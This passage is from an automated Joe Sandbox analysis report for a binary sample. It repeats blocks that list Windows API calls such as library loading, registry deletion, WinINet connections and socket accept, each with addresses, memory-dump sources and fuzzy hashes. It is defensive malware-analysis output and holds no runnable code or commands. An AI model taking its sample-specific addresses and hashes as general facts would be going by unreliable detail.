                                            • Opcode Fuzzy Hash: 30468a8ff42d013e88d39edebd92a57e9fbcae7a1bdeba3f4334930383859e49
                                            • Instruction Fuzzy Hash: 4DD09E755047169AD7306F65A84CA52BBE4FF04711B518519E965E2390DA74D8808F60
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0085ECBE,?,0085EBBB), ref: 0085ECD6
                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0085ECE8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                            • API String ID: 2574300362-1816364905
                                            • Opcode ID: 51bb19e0fef120102c2241b7288ae2201a9db535c0fdf8d592dadf6fc7249387
                                            • Instruction ID: e54bd05cdb1e15263f7295f4df4deaec04f0443831bfbcb2ecba822df6f54106
                                            • Opcode Fuzzy Hash: 51bb19e0fef120102c2241b7288ae2201a9db535c0fdf8d592dadf6fc7249387
                                            • Instruction Fuzzy Hash: ECD0C774510723AFDB245F65EC4D646B7E4FF04751B108419FC65D2391DB74DC849B50
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0085BAD3,00000001,0085B6EE,?,0089DC00), ref: 0085BAEB
                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0085BAFD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetModuleHandleExW$kernel32.dll
                                            • API String ID: 2574300362-199464113
                                            • Opcode ID: 3dabf6d5b83c68b8a335786510d51bfe560e8e7344a288357f2cdf523eecbe5f
                                            • Instruction ID: 608f13a24dd7c70468dea1bd8da029bd09c0946c0e9c9a90455bb52267925cb5
                                            • Opcode Fuzzy Hash: 3dabf6d5b83c68b8a335786510d51bfe560e8e7344a288357f2cdf523eecbe5f
                                            • Instruction Fuzzy Hash: A9D0A734800B129FC7306F26E84CB51B7D4FF10711B008419EC53E2390D7B4C884CB11
                                            APIs
                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00863BD1,?,00863E06), ref: 00863BE9
                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00863BFB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                            • API String ID: 2574300362-4033151799
                                            • Opcode ID: 4d62005c7d5484b9007f554f814e799c3c92d66c6b19b6fd0a647e8d74bd1e52
                                            • Instruction ID: a8fb5e99d532afd81e91ad33ffbb697ef05526c3dccc523bba0cf09850f8c0ab
                                            • Opcode Fuzzy Hash: 4d62005c7d5484b9007f554f814e799c3c92d66c6b19b6fd0a647e8d74bd1e52
                                            • Instruction Fuzzy Hash: 09D09E745007529AD7205B65A809643BBA4FF26715F119419E455E2391E7B4D8808B50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92988cdaf481a7b252c6d662e661e7c4926a30cdbad427d046188016f1ed1409
                                            • Instruction ID: 0716fca0fa316e8364ff3e51a15ec0bbff58be1cda8be77821234bd889811502
                                            • Opcode Fuzzy Hash: 92988cdaf481a7b252c6d662e661e7c4926a30cdbad427d046188016f1ed1409
                                            • Instruction Fuzzy Hash: 50C15E75A0021AEFDB14DF94C884EAEB7B5FF88704F104598E986EB251D7B0DE41DB90
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0085AAB4
                                            • CoUninitialize.OLE32 ref: 0085AABF
                                              • Part of subcall function 00840213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0084027B
                                            • VariantInit.OLEAUT32(?), ref: 0085AACA
                                            • VariantClear.OLEAUT32(?), ref: 0085AD9D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                            • String ID:
                                            • API String ID: 780911581-0
                                            • Opcode ID: 503bec09a9c2eb6421bb6a86b1ae141d048c34f52e64b95cae3041416a8f19f5
                                            • Instruction ID: b97d6e22f8b52adde3683bc1788a095cb3a2839d811e74df3512a22584e50398
                                            • Opcode Fuzzy Hash: 503bec09a9c2eb6421bb6a86b1ae141d048c34f52e64b95cae3041416a8f19f5
                                            • Instruction Fuzzy Hash: 9AA116352047019FCB15EF18C891A5AB7E5FF88715F148549FA9ADB3A2CB30ED48CB86
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$AllocClearCopyInitString
                                            • String ID:
                                            • API String ID: 2808897238-0
                                            • Opcode ID: 63bca090e538f53b01fba4a472abd5f20f8931d50ee2ed0c4d3bcd15ccf0d990
                                            • Instruction ID: 62d60d36c6c5168874ce49de430819b8f3db8c77c4a09ea0427134c9fd2bc0f3
                                            • Opcode Fuzzy Hash: 63bca090e538f53b01fba4a472abd5f20f8931d50ee2ed0c4d3bcd15ccf0d990
                                            • Instruction Fuzzy Hash: 4E51A670640306DBDB24AF69D891A6EB3E5FF84314F20981FE5D6C73D1DBB498808746
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                            • String ID:
                                            • API String ID: 3877424927-0
                                            • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                            • Instruction ID: f15c66325df4b791a4ffd94f2d1edacebda08ac279fc48c6d5efddf635af7a04
                                            • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                            • Instruction Fuzzy Hash: BF51B8B0A00325AFDF248F69A8A456E77A5FF50320F248739F825D62D0D7789FD09B41
                                            APIs
                                            • GetWindowRect.USER32(00F465E0,?), ref: 0086C544
                                            • ScreenToClient.USER32(?,00000002), ref: 0086C574
                                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0086C5DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ClientMoveRectScreen
                                            • String ID:
                                            • API String ID: 3880355969-0
                                            • Opcode ID: ec7e9d29982fa76aabb8e5663c1bc3fa1adee2d2756e9027087db2151b64366c
                                            • Instruction ID: d69c41ed4b140ecc2ee2354ab16129a6b2eaf061ab333f7a5d9285a2363ef7a3
                                            • Opcode Fuzzy Hash: ec7e9d29982fa76aabb8e5663c1bc3fa1adee2d2756e9027087db2151b64366c
                                            • Instruction Fuzzy Hash: 07513B75A00208AFCF20DF68C884ABE7BB5FB65324F118659F9A5DB291D770ED41CB90
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0083C462
                                            • __itow.LIBCMT ref: 0083C49C
                                              • Part of subcall function 0083C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0083C753
                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0083C505
                                            • __itow.LIBCMT ref: 0083C55A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$__itow
                                            • String ID:
                                            • API String ID: 3379773720-0
                                            • Opcode ID: 2fcffa27580adcdf8b533df9bf4cefaab968dd47f1b371fdbb7959e646955ac2
                                            • Instruction ID: ecab665c158f6f4051c615683cca8e3d6dd0462334f4fdf047719f22cde04647
                                            • Opcode Fuzzy Hash: 2fcffa27580adcdf8b533df9bf4cefaab968dd47f1b371fdbb7959e646955ac2
                                            • Instruction Fuzzy Hash: 05418071A00208ABDF21DF58DC56BEE7BB5FF99700F000059FA05E7281DB709A458BA2
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0086B5D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 2b78ee05f4938a49986007d477c8274ce8de1e4e9505cae5916c30f0b8c27f37
                                            • Instruction ID: 38852dc671b40513c27cb0e5e46c833a9af1cde5c242219845811d6207f9718f
                                            • Opcode Fuzzy Hash: 2b78ee05f4938a49986007d477c8274ce8de1e4e9505cae5916c30f0b8c27f37
                                            • Instruction Fuzzy Hash: E931C074641208BFEF208F58CC89FE87765FB1631CF664511FA52D62E2DB30A9C08B52
                                            APIs
                                            • ClientToScreen.USER32(?,?), ref: 0086D807
                                            • GetWindowRect.USER32(?,?), ref: 0086D87D
                                            • PtInRect.USER32(?,?,0086ED5A), ref: 0086D88D
                                            • MessageBeep.USER32(00000000), ref: 0086D8FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Rect$BeepClientMessageScreenWindow
                                            • String ID:
                                            • API String ID: 1352109105-0
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00834038
                                            • __isleadbyte_l.LIBCMT ref: 00834066
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00834094
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008340CA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 00867CB9
                                              • Part of subcall function 00845F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00845F6F
                                              • Part of subcall function 00845F55: GetCurrentThreadId.KERNEL32 ref: 00845F76
                                              • Part of subcall function 00845F55: AttachThreadInput.USER32(00000000,?,0084781F), ref: 00845F7D
                                            • GetCaretPos.USER32(?), ref: 00867CCA
                                            • ClientToScreen.USER32(00000000,?), ref: 00867D03
                                            • GetForegroundWindow.USER32 ref: 00867D09
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                            • String ID:
                                            • API String ID: 2759813231-0
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • GetCursorPos.USER32(?), ref: 0086F211
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0087E4C0,?,?,?,?,?), ref: 0086F226
                                            • GetCursorPos.USER32(?), ref: 0086F270
                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0087E4C0,?,?,?), ref: 0086F2A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                            • String ID:
                                            • API String ID: 2864067406-0
                                            APIs
                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00854358
                                              • Part of subcall function 008543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00854401
                                              • Part of subcall function 008543E2: InternetCloseHandle.WININET(00000000), ref: 0085449E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$CloseConnectHandleOpen
                                            • String ID:
                                            • API String ID: 1463438336-0
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EC), ref: 00868AA6
                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00868AC0
                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00868ACE
                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00868ADC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Long$AttributesLayered
                                            • String ID:
                                            • API String ID: 2169480361-0
                                            APIs
                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00858AE0
                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00858AF2
                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00858AFF
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858B16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLastacceptselect
                                            • String ID:
                                            • API String ID: 385091864-0
                                            APIs
                                              • Part of subcall function 00841E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00840ABB,?,?,?,0084187A,00000000,000000EF,00000119,?,?), ref: 00841E77
                                              • Part of subcall function 00841E68: lstrcpyW.KERNEL32(00000000,?,?,00840ABB,?,?,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00841E9D
                                              • Part of subcall function 00841E68: lstrcmpiW.KERNEL32(00000000,?,00840ABB,?,?,?,0084187A,00000000,000000EF,00000119,?,?), ref: 00841ECE
                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00840AD4
                                            • lstrcpyW.KERNEL32(00000000,?,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00840AFA
                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00840B2E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: lstrcmpilstrcpylstrlen
                                            • String ID: cdecl
                                            • API String ID: 4031866154-3896280584
                                            APIs
                                            • _free.LIBCMT ref: 00832FB5
                                              • Part of subcall function 0082395C: __FF_MSGBANNER.LIBCMT ref: 00823973
                                              • Part of subcall function 0082395C: __NMSG_WRITE.LIBCMT ref: 0082397A
                                              • Part of subcall function 0082395C: RtlAllocateHeap.NTDLL(00F20000,00000000,00000001,00000001,00000000,?,?,0081F507,?,0000000E), ref: 0082399F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AllocateHeap_free
                                            • String ID:
                                            • API String ID: 614378929-0
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008405AC
                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008405C7
                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008405DD
                                            • FreeLibrary.KERNEL32(?), ref: 00840632
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                            • String ID:
                                            • API String ID: 3137044355-0
                                            APIs
                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00846733
                                            • _memset.LIBCMT ref: 00846754
                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008467A6
                                            • CloseHandle.KERNEL32(00000000), ref: 008467AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
